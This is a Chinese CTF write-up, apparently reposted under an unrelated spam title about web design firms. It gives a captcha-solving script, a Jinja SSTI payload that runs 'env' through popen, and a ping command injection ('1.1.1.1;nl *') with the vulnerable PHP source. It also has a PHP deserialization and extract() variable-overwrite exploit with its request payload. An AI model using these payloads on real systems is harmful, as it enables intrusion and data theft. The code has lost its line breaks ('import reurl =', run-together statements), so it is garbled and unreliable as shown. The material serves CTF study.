大气的网络公司名字_东莞网站建设方案企业_十大管理培训课程_手把手教你优化网站

时间:2025/7/15 14:52:37来源：https://blog.csdn.net/2302_80472909/article/details/144634095 浏览次数:0次

web1

import requests
import reurl = "http://139.155.126.78:25321/"
cookies = {"PHPSESSID": "059ba144cdb27305c05248c71ea9a9cf"}i=1
while(i!=35):res = requests.get(url,cookies=cookies)match = re.search(r"Calculate: (\d+)\s*([\+\-\*/])\s*(\d+)", res.text)print(match.group(0))ans=eval(match.group(1)+match.group(2)+match.group(3))data={"answer":ans}res=requests.post(url=url,data=data,cookies=cookies)print(ans)i=i+1correct_count = int(re.search(r"Correct Count: (\d+)/", res.text).group(1))print(correct_count)

再次访问即可

在这里插入图片描述

web2

进去一堆图片, 随便翻翻没找到啥东西, 后面发现有个搜索框, 随便输入一点东西发现会回显输入的
感觉是ssti, 直接尝试 {{2*2}} 发现会回显出4,
接下来就是直接构造payload了

直接用[] 去引用发现会返回 error, 所以使用 __getitem__ 绕过, 根目录下存在flag, 但是没有权限读取, 尝试在环境里面找找可以找到

name={{"".__class__.__base__.__subclasses__().__getitem__(137).__init__.__globals__.__getitem__("popen")("env").read()}}

在这里插入图片描述

web3

说实话第一步就一直卡着了, dirsearch扫了个www.zip , 看到那个load.php, 一直以为是要文件上传(感觉这题目有点抽象,寄)

执行命令, 有长度限制, 后面最多四个字符
看目录
lsj=1.1.1.1;ls 读文件
lsj=1.1.1.1;nl *

index.php

<?php
$pat = "/^(((1?\d{1,2})|(2[0-4]\d)|(25[0-5]))\.){3}((1?\d{1,2})|(2[0-4]\d)|(25[0-5]))/";if (isset($_POST['lsj'])) {$lsj = $_POST['lsj'];if (empty($lsj)) {echo "没C 你让我打你啊";} elseif (preg_match("/[`;\|\&$() \/\'>\"\t]</", $lsj)) {echo "C就C吧，开什么挂啊~";} elseif (!preg_match($pat, $lsj)) {echo "格式都不对你怎么C";} elseif (strlen($lsj) > 12) {echo "谁叫你C这~么长的";} else {@system("ping -c 2 $lsj");}
}
?>

p0pmart.php 里面存在反序列化可以拿flag

<?php
error_reporting(0);
require_once("flag.php");class Popmart {public $yuki;public $molly;public $dimoo;public function __construct() {$this->yuki = 'tell me where';$this->molly = 'dont_tell_you';$this->dimoo = "you_can_guess";}public function __wakeup() {global $flag;global $where_you_go;$this->yuki = $where_you_go;if ($this->molly === $this->yuki) {echo $flag;}}
}$pucky = $_GET['wq'];if (isset($pucky)) {if ($pucky === "二仙桥") {extract($_POST);if ($pucky === "二仙桥") {die("<script>window.alert('说说看，你要去哪？？');</script>");}unserialize($pucky);}
}
?>

反序列化, 利用extract 变量覆盖一下就行

<?php
error_reporting(0);
class Popmart {public $yuki;public $molly;public $dimoo;public function __construct() {$this->yuki = 'tell me where';$this->molly = 'dont_tell_you';$this->dimoo = "you_can_guess";}public function __wakeup() {global $flag;global $where_you_go;$this->yuki = $where_you_go;if ($this->molly === $this->yuki) {echo $flag;}}
}$a=new Popmart();
echo serialize($a);

GET:  ?wq=二仙桥POST: 
pucky=O:7:"Popmart":3:{s:4:"yuki";s:13:"tell me where";s:5:"molly";s:13:"dont_tell_you";s:5:"dimoo";s:13:"you_can_guess";}&where_you_go=dont_tell_you

在这里插入图片描述

DS

直接运行脚本提交就行

import re
import csv# 定义手机号的前3位虚假号段集合
fake_phone_prefixes = ['734', '735', '736', '737', '738', '739', '747', '748', '750', '751', '752', '757', '758', '759','772', '778', '782', '783', '784', '787', '788', '795', '798', '730', '731', '732', '740', '745','746', '755', '756', '766', '767', '771', '775', '776', '785', '786', '796', '733', '749', '753','773', '774', '777', '780', '781', '789', '790', '791', '793', '799'
]# 正则表达式匹配手机号：11位数字，且前3位在虚假号段集合中
phone_pattern = re.compile(r'(?:' + '|'.join(fake_phone_prefixes) + r')\d{8}')def classify_phone_numbers(file_path):classified_data = []buffer = ""  # 用于缓存跨块边界的数据with open(file_path, 'r', encoding='utf-8') as file:while True:chunk = file.read(1024)  # 读取1KB内容if not chunk:breakprint("正在处理的文本块:")print(chunk)  # 打印出当前读取的块内容# 将当前块与缓存的部分合并full_text = buffer + chunkmatches = phone_pattern.findall(full_text)# 将匹配到的手机号添加到分类数据中for match in matches:phone_number = re.sub(r'\D+', '', match)print("匹配到的结果:")print(phone_number)  # 打印匹配到的结果classified_data.append({"category": "phone", "value": phone_number})# 保存块的最后几个字符作为下次读取的缓存buffer = full_text[-10:]  # 缓存最后10个字符，用于下一块拼接return classified_datadef save_to_csv(data, output_file):# 写入 CSV 文件with open(output_file, 'w', newline='', encoding='utf-8') as csvfile:fieldnames = ['category', 'value']writer = csv.DictWriter(csvfile, fieldnames=fieldnames)writer.writeheader()for row in data:writer.writerow(row)# 主程序
if __name__ == "__main__":input_file = 'data.txt'  # 输入文件output_file = 'classified_data.csv'  # 输出 CSV 文件# 分类手机号classified_data = classify_phone_numbers(input_file)# 保存到 CSVsave_to_csv(classified_data, output_file)print(f"数据已保存到 {output_file}")